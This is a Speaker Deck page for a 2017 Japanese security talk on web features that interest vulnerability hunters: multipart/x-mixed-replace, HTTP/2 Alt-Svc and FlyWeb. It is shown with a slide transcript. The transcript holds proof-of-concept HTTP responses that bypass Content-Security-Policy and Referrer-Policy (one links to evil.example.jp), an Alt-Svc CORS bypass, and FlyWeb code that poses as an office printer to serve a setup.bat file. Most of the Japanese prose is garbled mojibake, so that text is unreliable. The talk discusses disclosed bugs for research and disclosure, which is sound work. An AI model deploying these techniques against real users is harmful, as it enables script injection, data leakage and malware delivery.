Upgrade to Pro — share decks privately, control downloads, hide ads and more …

脆弱性発見者が注目する近年のWeb技術

MUNEAKI NISHIMURA
February 03, 2017
Technology
29
13k

 脆弱性発見者が注目する近年のWeb技術

RECRUIT Technologies NIGHT vol.3の発表資料です。

MUNEAKI NISHIMURA

February 03, 2017
Tweet

More Decks by MUNEAKI NISHIMURA

See All by MUNEAKI NISHIMURA
Brave Browserの脆弱性を見つけた話(iOS編)
nishimunea
3
1.9k
ブラウザの脆弱性とそのインパクト
nishimunea
26
9.4k
脆弱性発見者の目から見た、脆弱性対応の最前線
nishimunea
15
2.6k
Slack Team for Security Testers and Bug Hunters
nishimunea
1
720
Finding Vulnerabilities in Firefox for iOS
nishimunea
3
8.1k
SWIFT Code for Mozilla Bank
nishimunea
1
850
次世代プラットフォームのセキュリティモデル考察
nishimunea
6
4.9k

Other Decks in Technology

See All in Technology
プロトタイピングによる不確実性の低減 / Reducing Uncertainty through Prototyping
ohbarye
3
240
Microsoft Cloudで 開発ライフサイクルを保護する
kkamegawa
0
140
複雑な構成要素を持つUIとの向き合い方 〜新・支出グラフでの実例〜 / B43 TECH TALK
nakamuuu
0
100
ここが嬉しいABAC ここが辛いよABAC #再解説+補足編
masahirokawahara
0
220
Delivering Millions of Messages within seconds @ Duolingo
pelelgrino
0
340
「ふりかえりのふりかえり」をふりかえり、実のあるふりかえりにする
naitosatoshi
0
220
[PlatformCon 24] Platform Orchestrators: The Missing Middle of Internal Developer Platforms?
danielbryantuk
1
180
TransitGatewayの基礎
toru_kubota
0
230
Cloud Native Java with Spring Boot (CNCF Aarhus, April 2024)
thomasvitale
1
120
シン・Kafka / shin-kafka
oracle4engineer
PRO
7
2.7k
巨大なテーブルのテーブル定義を無停止で安全に誰でも変更できるようにする / Table-definitions-for-huge-tables-can-be-modified-by-anyone-safely-and-non-disruptively
freee
1
740
2024/4/26 コンピュータ歴史博物館解説告知
toshi_atsumi
0
200

Featured

See All Featured
What's in a price? How to price your products and services
michaelherold
237
11k
Being A Developer After 40
akosma
56
580k
Clear Off the Table
cherdarchuk
83
310k
jQuery: Nuts, Bolts and Bling
dougneiner
59
7.1k
Infographics Made Easy
chrislema
237
18k
Music & Morning Musume
bryan
41
5.6k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
9
8.3k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
76
41k
Dealing with People You Can't Stand - Big Design 2015
cassininazir
356
22k
Into the Great Unknown - MozCon
thekraken
10
980
Gamification - CAS2011
davidbonilla
76
4.6k
The Cost Of JavaScript in 2023
addyosmani
14
3.8k

Transcript

  1. ੬ऑੑൃݟऀ͕஫໨͢Δۙ೥ͷ8FCٕज़ 3&$36*55FDIOPMPHJFT/*()5WPM ೥݄೔

  2. ੢ଜ फߊ גࣜձࣾϦΫϧʔτςΫϊϩδʔζ αΠόʔηΩϡϦςΟΤϯδχΞϦϯά෦ γχΞηΩϡϦςΟΤϯδχΞ ࠃ಺ܞଳి࿩ϝʔΧʔͰͷηΩϡϦςΟίϯαϧλϯτ ͳͲΛܦͯ೥݄ΑΓݱ৬ɻϦΫϧʔτͷ*%؅ཧج ൫ͷηΩϡϦςΟอक΍ϦΫϧʔτάϧʔϓશࣾͷ੬ऑ ੑमਖ਼ࢧԉʹܞΘΔɻझຯ͸ϒϥ΢βͷ੬ऑੑΛ୳͢͜ ͱɻ೥ʹใࠂͨ͠੬ऑੑ͸݅Λ௒͑Δɻஶॻʹ

    ϒϥ΢βϋοΫʢ؂༁ʣɻओͳߨԋྺʹ$0%& #-6& ɺ"750,:0 ɺ1BD4FD ɻ೥ΑΓ ηΩϡϦςΟɾΩϟϯϓશࠃେձߨࢣ

  3. ੬ऑੑΛൃݟ͢Δਓͷࢹ఺Ͱ ஫໨͍ͯ͠Δ8FCٕज़Λ঺հ͠·͢

  4. Server Push

  5. • ௕೥ʹ౉Γٞ࿦ͱվળ͕ଓ͚ΒΕ͍ͯΔ8FCٕज़ • աڈʹ͸4FSWFS4FOU&WFOUT΍8FC4PDLFU • *&5'Ͱ͸)551QVTIΛޮՌతʹѻ͏ٕज़ͱͯ͠ &BSMZ)JOUT͕ఏҊ͞Ε͍ͯΔ • ଞʹ΋ɺϒϥ΢βͰ1VTI௨஌Λड͚औΔٕज़ͷඪ४Խ͕ਐΜͰ͓Γɺ 8FC1VTIϓϩτίϧ΍1VTI"1*ͷ࢓༷ࡦఆ͕ߦͳΘΕ͍ͯΔ

    • ͦΜͳதɺݸਓతʹ஫໨͍ͯ͠Δͷ͸ʜ 4FSWFS1VTI

  6. multipart / x-mixed-replace

  7. http://web.archive.org/web/19961020045320/http://www3.netscape.com/assist/net_sites/pushpull.html

  8. • ೥ɺ/FUTDBQFʹ౥ࡌ͞Εͨ࠷ݹͷ4FSWFS1VTI • .+1&(PWFS)551ͷ഑৴खஈͱͯ͠΋࢖༻͞Ε͍ͯΔ • .P[JMMBͷ5FMFNFUSZʹΑΔͱɺݱࡏͷར༻཰͸ • ݱࡏͰ͸ɺ'JSFGPY͘Β͍͔͠·ͱ΋ʹαϙʔτ͍ͯ͠ͳ͍ • ҰମͲ͜Ͱ࢖ΘΕ͍ͯΔͷ͔

    NVMUJQBSUYNJYFESFQMBDF

  9. #VH[JMMBͷݕࡧը໘ https://bugzilla.mozilla.org/buglist.cgi?quicksearch=nishimunea

  10. 3*$0)5)&5" https://developers.theta360.com/ja/docs/v2.1/api_reference/commands/camera.get_live_preview.html

  11. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html <h1>Page 1</h1> --BOUNDARY

    Content-type: text/html <h1>Page 2</h1> --BOUNDARY- ϖʔδ໨ͷσʔλ ϖʔδ໨ͷσʔλ

  12. Կނ஫໨͍ͯ͠Δ͔ͱ͍͏ͱ

  13. ηΩϡϦςΟϔομΛΑ͘ແࢹ͢Δ

  14. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY Content-Security-Policy: default-src 'self' --BOUNDARY Content-type: text/html

    <script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY- $41ͰΠϯϥΠϯεΫϦϓτͷ࣮ߦΛېࢭ

  15. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY Content-Security-Policy: default-src 'self' --BOUNDARY Content-type: text/html

    <script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY-

  16. https://www.mozilla.org/en-US/security/advisories/mfsa2016-45/

  17. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html Content-Security-Policy: default-src 'self'

    <script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY- $41ϔομͷҐஔΛԼʹͣΒͯ͠ΈΔ

  18. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html Content-Security-Policy: default-src 'self'

    <script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY-

  19. ·ͩ௚ͬͯͳ͍ https://bugzilla.mozilla.org/show_bug.cgi?id=1296471

  20. https://bugzilla.mozilla.org/show_bug.cgi?id=1296471 ੬ऑੑΛӅ͢͜ͱΑΓɺ$41ͷ࣮૷͕ෆ׬શͰ͋Δ͜ͱΛ 8FCαΠτͷ։ൃऀ͕஌Δ͜ͱͷํ͕େ੾ͩͱ൑அ͠ɺ .P[JMMB͸ະमਖ਼ͷ੬ऑੑ৘ใΛ։ࣔ

  21. HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY Referrer-Policy: no-referrer --BOUNDARY Content-type: text/html <a

    href="https://evil.example.jp">Link</a> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY- 3FGFSSFS1PMJDZϔομͰϦϑΝϥૹग़Λېࢭ ͳͷʹϦϑΝϥ͕ૹΒΕΔ

  22. https://www.mozilla.org/en-US/security/advisories/mfsa2017-01/#CVE-2017-5385 'JSFGPYͰઌिमਖ਼͞Εͨ

  23. ৽͍͠ϔομ͕ొ৔͢Δͨͼָ͠ΊΔ

  24. HTTP/2

  25. • ೔࿨ݟ҉߸Λѱ༻ͯ͠ɺِͷ)5514αʔόʹ઀ଓͤ͞Δ͜ͱͷ Ͱ͖Δ੬ऑੑʢ$7&ʣΛ-5Ͱ঺հͨ͠ +YDL͞Μͱͷग़ձ͍͸ɺIUUQษڧձͰͨ͠ https://http2study.connpass.com/event/13251/

  26. ͦͷ੬ऑੑͷ࠶ݱө૾ΛݟͯΈ·͠ΐ͏

  27. ੬ऑੑͷݪҼ͸5-4ηογϣϯͷ࠶ར༻Ͱͨ͠ twitter.com (Fake) evil.csrf.jp https://twitter.com Reuse TLS Session Ticket (Session

    Resumption) Fake Application Data http://evil.csrf.jp alt-svc: h2="twitter.com:8021" TLS Session Ticket http://evil.csrf.jp Establish TLS Session without server certificate verification

  28. ੬ऑੑͷݪҼ͸5-4ηογϣϯͷ࠶ར༻Ͱͨ͠ twitter.com (Fake) evil.csrf.jp https://twitter.com Reuse TLS Session Ticket (Session

    Resumption) Fake Application Data http://evil.csrf.jp alt-svc: h2="twitter.com:8021" TLS Session Ticket http://evil.csrf.jp Establish TLS Session without server certificate verification ೔࿨ݟ҉߸Ͱαʔόূ໌ॻΛݕূͤͣʹ ཱ֬ͨ͠5-4ηογϣϯΛʜ )5514௨৴࣌ʹ࠶ར༻͍ͯͨ͠

  29. • )551$POOFDUJPO3FVTF 3'$ - ಉ͡*1ΞυϨεɺ͔ͭಉ͡ূ໌ॻͷ$/4"/ʹؚ·ΕΔϗετͱͷ௨৴Ͱ͋Ε͹ɺ )551ίωΫγϣϯΛڞ༗ͯ͠Α͍ • )551"MUFSOBUJWF4FSWJDFT 3'$ -

    ಉ͡ϦιʔεΛఏڙ͢Δ୅ସαʔόͷ࢖༻ΛΫϥΠΞϯτʹఏҊ͢Δ - ྫʣBMUFYBNQMFKQͷ൪ϙʔτͰ)551ʹΑΔ௨৴ΛΦϑΝʔ )551ͷίωΫγϣϯ؅ཧ͸ͳ͔ͳ͔େม alt-svc: h2="alt.example.jp:8000";

  30. flickr.com ෳ਺υϝΠϯͷ)551ίωΫγϣϯΛڞ༗͢Δͱ͖ flickr.com yahoo.com yahoo.com Certificate (valid for yahoo.com &

    flickr.com) Establish TLS Session ZBIPPDPNͱͷ௨৴Ͱཱ֬͞ΕͨίωΫγϣϯΛ GMJDLSDPNͱͷ௨৴ʹར༻Ͱ͖Δ Connection

  31. flickr.com αʔόূ໌ॻͷϐϯχϯάݕূ͕Α͘࿙ΕΔ flickr.com yahoo.com yahoo.com Certificate (valid for yahoo.com &

    flickr.com) Establish TLS Session Connection ͜͜ͰɺGMJDLSDPNͷެ։伴ϐϯχϯάΛݕূ͠๨Εͯ͠·͏ $7&ʢ'JSFGPYʣ$7&ʢ$ISPNFʣ

  32. flickr.com ͦΕͬͯ੬ऑੑʁ flickr.com yahoo.com Certificate (valid for yahoo.com & flickr.com)

    Connection yahoo.com Establish TLS Session ྆ํͷαΠτͷݖརऀ͸ҰॹͳͷͰ GMJDLSDPNͷϐϯχϯάΛݕূ͠ͳͯ͘΋ ࣮࣭తͳڴҖ͸͋·Γͳ͍ͷͰ͸ʁ

  33. ಉ͡ূ໌ॻ͔ͩΒαΠτͷݖརऀ͕ಉ͡ͱ͸ݶΒͳ͍ • ྫ͑͹ɺ'BTUMZͷڞ༗ূ໌ॻαʔϏε - IUUQTKBGPVSTRVBSFDPN ͷূ໌ॻΛݟͯΈΑ͏

  34. ͜ΕΒͷαΠτͷϐϯχϯάΛᷖճͰ͖Δͱ͍͏͜ͱ

  35. )551"MUFSOBUJWF4FSWJDF "MU4WD a.example.com HTTP/2 Application Data (authority: a.example.com) a.example.com alt-svc:

    h2="b.example.jp:443" Certificate a.example.com Establish TLS Session b.example.jp Verify Certificate

  36. "MU4WDͷਖ਼͍࣮͠૷͸͜͏ͳΜͰ͕͢ʜ a.example.com HTTP/2 Application Data (authority: a.example.com) a.example.com alt-svc: h2="b.example.jp:443"

    Certificate a.example.com Establish TLS Session b.example.jp Verify Certificate BFYBNQMFDPNͷূ໌ॻΛ4/*Ͱཁٻ BFYBNQMFDPNͷূ໌ॻͰ͋Δ͜ͱΛݕূ

  37. ࣮૷ΛޡΔͱ%/4ϦόΠϯσΟϯά੬ऑੑʹͳΔ a.example.com HTTP/2 Application Data (authority: a.example.com) a.example.com alt-svc: h2="b.example.jp:443"

    Certificate a.example.com Establish TLS Session b.example.jp Verify Certificate CFYBNQMFKQͷূ໌ॻΛ4/*Ͱཁٻ CFYBNQMFKQͷূ໌ॻͰ͋Δ͜ͱΛݕূ BFYBNQMFDPNͷ)551σʔλΛ ଞਓͷαʔόʹૹΓ෇͚Δ͜ͱ͕Ͱ͖Δ

  38. ͜ͷ࣮૷ϛε͕ݪҼͰ$034ΛᷖճͰ͖ͨྫ΋ evil XMLHttpRequest with DELETE method alt-svc: h2="victim:443" victim Preflight

    (OPTIONS method) DELETE request 1SFGMJHIUΛ߈ܸऀͷαΠτͰड͚ͯʜ ࣮ϦΫΤετ͚ͩΛඪతʹૹΔ

  39. https://bugzilla.mozilla.org/show_bug.cgi?id=1148357 ࢲ͸ڻ͍͍ͯΔɻ͜Ε͸"MU4WDΛ༻͍ͨॳͷ੬ऑੑͩ

  40. ಉ͡Α͏ͳ੬ऑੑ͕͖ͬͱࠓޙ΋ग़͖ͯͦ͏

  41. FlyWeb

  42. https://flyweb.github.io/#showcase

  43. • .P[JMMB͕࣮ࢪ͍ͯ͠Δɺ8FCͱ෺ཧσόΠεͷ࿈ܞϓϩδΣΫτ - 8FCίϯςϯπͱɺͦΕΛӾཡͨ͠ਓͷۙ͘ʹ͋Δ༷ʑͳσόΠε͕࿈ಈ • ϓϩδΣΫτ͸·࣮ͩݧஈ֊ - 'JSFGPY/JHIUMZʹͷΈσϑΥϧτແޮͰ౥ࡌ - BCPVUDPOGJH

    Ͱ EPNGMZXFCFOBCMFEUSVFʹઃఆ͢Δ͜ͱͰར༻Մೳ 'MZ8FC

  44. • ෳ਺ͷεϚϗΛ઀ଓ͠ɺϒϥ΢β্ͰରઓܕϨʔεήʔϜΛ࣮ݱ 'MZ8FCͷར༻ྫʢ'MZ8FC(1ʣ https://www.youtube.com/watch?v=FJ5DEGvqDb4

  45. 'MZ8FCͷ࢓૊Έ Local Network (1) Launch a website (2) HTML /

    JS (3) Publish mDNS and web servers (4) DNS Service Discovery (5) HTTP & WebSocket +BWB4DSJQUͰαʔόΛ্ཱͪ͛Δ ϩʔΧϧΤϦΞ಺ͷ୺຤͕ͦͷαʔόʹΞΫηε

  46. navigator.publishServer('MyServer').then(server => { server.onfetch = e => { var headers

    = {'Content-Type': 'text/html'}; var body = '<h1>Hello FlyWeb</h1>'; e.respondWith(new Response(body, {headers: headers})); }; });

  47. navigator.publishServer('MyServer').then(server => { server.onfetch = e => { var headers

    = {'Content-Type': 'text/html'}; var body = '<h1>Hello FlyWeb</h1>'; e.respondWith(new Response(body, {headers: headers})); }; }); .Z4FSWFS@GMZXFC@UDQMPDBMͱ͍͏αʔϏε໊Ͱ N%/4ͱ)551αʔόΛىಈ ϩʔΧϧΤϦΞͷ୺຤͕αʔόʹΞΫηε͖ͯͨ͠Β )FMMP'MZ8FCͱॻ͔Εͨ)5.-Λฦ͢

  48. αʔόͷىಈ֬ೝμΠΞϩά͕ग़ͯ ϖʔδΛݟͨϢʔβ͕ʮ"MMPX4FSWFSʯΛબ୒͢Δͱ ϩʔΧϧΤϦΞͰN%/4ͱ)551αʔό͕ىಈ͢Δ

  49. ϩʔΧϧΤϦΞʹ͋Δผͷ୺຤͕αʔόʹͭͳ͕Δ • 'JSFGPY͕ϩʔΧϧΤϦΞʹ͋Δ'MZ8FCαʔόΛࣗಈతʹ୳ࡧ͠ɺ ΞΫηεͰ͖ΔΑ͏ʹͯ͘͠ΕΔ

  50. #POKPVSରԠΦϑΟεϓϦϯλͷ؅ཧը໘΋։͚Δ • 'JSFGPYͷ'MZ8FC΢Οϯυ΢͸@IUUQUDQʹ΋ରԠ͍ͯ͠ΔͷͰ #POKPVSͰ)551ͷ6*Λఏڙ͢Δػثʹ΋ΞΫηεͰ͖Δ

  51. 'MZ8FCͰձࣾͷωοτϫʔΫʹ৵ೖͰ͖ͦ͏ͩ Local Network (1) Launch a website (2) HTML /

    JS (3) Publish mDNS and web servers (4) Launch HTTP UI (5) Download malware 'MZ8FCͰΦϑΟεϓϦϯλͷ ؅ཧը໘ʹͳΓ͢·͢ ؅ཧը໘ʹΞΫηεͨ͠୺຤ʹ Ϛϧ΢ΣΞ഑෍ ͏͔ͬΓࣾһ͕᠘αΠτΛӾཡ

  52. navigator.publishServer('Can0n ME220').then(server => { server.onfetch = e => { var

    h = {'Content-Type': 'application/bat', 'Content-Disposition': 'attachment; filename=setup.bat'}; var cmd = 'calc'; e.respondWith(new Response(cmd, {headers: h})); }; }); ΦϑΟεϓϦϯλͱಉ͡%/4໊Λࢦఆ ΞΫηεͨ͠୺຤ʹ TFUVQCBU Λ഑෍

  53. ͕͢͞ʹυϝΠϯ͕ո͍͠ͷͰܯռ͞Εͦ͏͚ͩͲʜ

  54. (PPHMF຋༁ܦ༝Ͱ։͚͹ͦΕͬΆ͍υϝΠϯʹ

  55. ଞͷࣾһِ͕ͷΦϑΟεϓϦϯλʹΞΫηε͢Δͱʜ ϓϦϯλυϥΠό͔ͳ͊ʜʁ

  56. None

  57. ͜ͷ··ͷ࢓༷ͩͱຊ౰ʹѱ༻͞Εͦ͏

  58. • 4FSWFS1VTI NVMUJQBSUYNJYFESFQMBDF • )551 • 'MZ8FC ஫໨͍ͯ͠Δ8FCٕज़Λͭ঺հ͠·ͨ͠